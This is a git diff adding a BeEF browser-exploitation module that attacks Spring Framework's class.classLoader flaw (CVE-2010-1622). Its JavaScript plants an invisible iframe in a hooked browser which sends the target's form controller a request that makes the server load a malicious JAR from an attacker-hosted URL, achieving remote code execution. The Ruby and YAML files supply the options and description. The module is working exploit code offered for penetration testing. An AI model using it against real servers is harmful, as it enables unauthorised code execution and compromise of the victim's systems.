diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
new file mode 100644
index 000000000..00804c652
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -0,0 +1,32 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ jar_file = "<%= @jar_file %>";
+ form_controller = "<%= @form_controller %>";
+
+ uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
+ var spring_iframe = beef.dom.createInvisibleIframe();
+ spring_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(spring_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
new file mode 100644
index 000000000..87d59d542
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ spring_framework_malicious_jar:
+ enable: true
+ category: "Exploits"
+ name: "Spring Framework Malicious Jar"
+ description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/
Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)"
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb
new file mode 100644
index 000000000..f1777b7f5
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Spring_framework_malicious_jar < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'},
+ {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end